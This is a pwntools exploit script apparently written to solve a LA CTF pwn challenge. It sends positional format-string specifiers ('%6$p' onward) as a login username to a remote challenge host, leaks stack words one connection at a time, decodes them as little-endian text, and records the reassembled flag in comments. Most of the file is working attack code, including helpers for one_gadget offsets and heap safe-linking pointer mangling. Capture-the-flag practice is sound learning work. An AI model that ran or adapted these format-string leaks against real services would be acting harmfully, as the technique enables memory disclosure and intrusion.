#!/usr/bin/env python3
from pwn import *
# Target binary plus the libc and dynamic loader that ship with the challenge
# (the "_patched" name suggests the binary was re-linked against them; ld is
# loaded but not used by the probes below).
elf = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

# Derive arch / word size / endianness for pwntools from the target itself.
context.binary = elf
# GDB=1 opens the debugger in a 70%-wide tmux split.
context.terminal = ["tmux", "splitw", "-hp", "70"]
# Enable to see every byte on the wire while tuning the format-string offsets.
# context.log_level = "debug"

# gdb script used by start() when run with GDB=1.
gs = """
b main
continue
"""
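def one_gadget(filename, base_addr=0):
    """Return the gadget offsets the ``one_gadget`` tool reports for ``filename``.

    Runs the external ``one_gadget`` command with ``--raw`` (plain
    whitespace-separated offsets) and ``-l1`` (its output-level option) and
    adds ``base_addr`` to every offset, so the result is directly usable once
    the libc base is known.

    Args:
        filename: path to the libc (or other ELF) to scan.
        base_addr: value added to each offset; 0 returns raw offsets.

    Returns:
        list[int] of rebased gadget addresses; empty when the tool prints nothing.

    Raises:
        FileNotFoundError if ``one_gadget`` is not on PATH;
        subprocess.CalledProcessError if it exits non-zero;
        ValueError if its output is not made of integers.
    """
    # argv list, no shell: ``filename`` is passed verbatim, so shell
    # metacharacters in the path cannot turn into command injection.
    raw = subprocess.check_output(["one_gadget", "--raw", "-l1", filename])
    # split() rather than split(' '): a trailing newline or doubled space
    # would otherwise yield an empty token that int() rejects.
    return [int(tok) + base_addr for tok in raw.decode().split()]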
#onegadgets = one_gadget('libc.so.6', libc.address)
def start():
    """Open a tube to the target according to the pwntools command-line flags.

    ``REMOTE=1`` connects to the live challenge host, ``GDB=1`` runs the
    local binary under gdb with the ``gs`` script, and otherwise a plain
    local process is spawned.  The caller binds the result to the global
    ``r`` that the send/recv helpers use.

    The remote host and port are hard-coded; since the script sends
    format-string probes, only point it at the challenge target.
    """
    if args.REMOTE:
        tube = remote("chall.lac.tf", 31142)
    elif args.GDB:
        tube = gdb.debug([elf.path], gdbscript=gs)
    else:
        tube = process([elf.path])
    return tube
def rcu(d1, d2=0):
    """Skip past delimiter ``d1`` on the global tube ``r`` and optionally read on.

    The bytes up to and including ``d1`` are discarded.  When ``d2`` is
    given (truthy), the bytes between ``d1`` and ``d2`` are returned with
    ``d2`` dropped as well; otherwise ``None`` is returned.  Both delimiters
    are handed straight to ``recvuntil``, so bytes and str are accepted.
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log the libc base currently set on the ``libc`` ELF object."""
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log a leaked value as ``<name> = 0x...``."""
    return log.info(name + " = %#x" % val)


def sa(delim, data):
    """Shorthand for ``r.sendafter`` on the global tube."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Shorthand for ``r.sendlineafter`` on the global tube."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Shorthand for ``r.sendline`` on the global tube."""
    return r.sendline(line)


def bc(value):
    """Render ``value`` as ASCII bytes, e.g. ``bc(6) == b"6"``."""
    return str(value).encode("ascii")


def demangle_base(value):
    """Recover an address from its ``>> 12`` form (inverse of the shift only)."""
    return value << 0xc


def remangle(heap_base, value):
    """Safe-linking style mangle: ``(heap_base >> 12) ^ value``.

    NOTE(review): glibc's PROTECT_PTR shifts the address of the slot that
    stores the pointer, not the heap base; this helper is only exact when
    that slot and ``heap_base`` share a 4 KiB page -- confirm at the call site.
    """
    return (heap_base >> 0xc) ^ value
#========= exploit here ===================
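def hex_bytes_to_ascii_little_endian(hex_bytes):
    """Turn the hex digits of a ``%p``-leaked stack word back into its text.

    ``%p`` prints the word as one big number, so on little-endian x86-64 the
    bytes appear reversed relative to memory order.  This decodes the hex,
    reverses the bytes, then decodes them as UTF-8.

    Args:
        hex_bytes: the digits after the ``0x`` prefix, as bytes or str;
            surrounding/embedded whitespace is ignored.

    Returns:
        The word's bytes as text, in memory order ("" for empty input).

    Raises:
        ValueError (including UnicodeDecodeError) when the digits are not hex
        or the bytes are not valid UTF-8 -- e.g. when the leaked word is a
        pointer rather than string data.
    """
    if isinstance(hex_bytes, bytes):
        hex_bytes = hex_bytes.decode()
    digits = "".join(hex_bytes.split())
    # %p drops leading zeros, so a word whose top nibble is 0 prints an odd
    # number of digits; restore the zero so fromhex sees whole bytes.
    if len(digits) % 2:
        digits = "0" + digits
    # Reverse the raw bytes *before* decoding so multi-byte characters
    # are not scrambled.
    return bytes.fromhex(digits)[::-1].decode("utf-8")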
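# Leak the flag one stack word at a time.  The username is a positional
# format-string read ("%N$p"); the server prints the result inside its
# "Incorrect password for user 0x..." line, so each connection yields one
# 8-byte word.  Offset 6 appears to be where the flag buffer starts, judging
# by the fragments recorded at the bottom of this file.
FIRST_OFFSET = 6
NUM_WORDS = 10

for i in range(NUM_WORDS):
    r = start()
    try:
        username = b"%" + bc(FIRST_OFFSET + i) + b"$p"
        # The passwords are filler; the leak comes from the username only.
        password = b"AAAAAAAA"
        password2 = b"BBBBBBBB"
        sla(b"username:", username)
        sla(b"password1:", password)
        sla(b"password2", password2)
        # Hex digits of the leaked word as %p printed them (no 0x, no newline).
        resp = rcu(b"Incorrect password for user 0x", "\n")
        try:
            log.success(hex_bytes_to_ascii_little_endian(resp))
        except ValueError:  # includes UnicodeDecodeError
            # Not text (a pointer, odd nibble count, ...): show the raw hex
            # instead of aborting the remaining probes.
            log.warning("offset %d: raw leak 0x%s" % (FIRST_OFFSET + i, resp.decode(errors="replace")))
        sleep(0.1)
    finally:
        # Also runs on EOF/timeout, so a failed probe never leaks a tube.
        r.close()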
#========= interactive ====================
# Recorded leak fragments (one stack word each, in probe order):
#lactf{hu
#nter2_cf
#c0xz68}
# Reassembled flag:
#lactf{hunter2_cfc0xz68}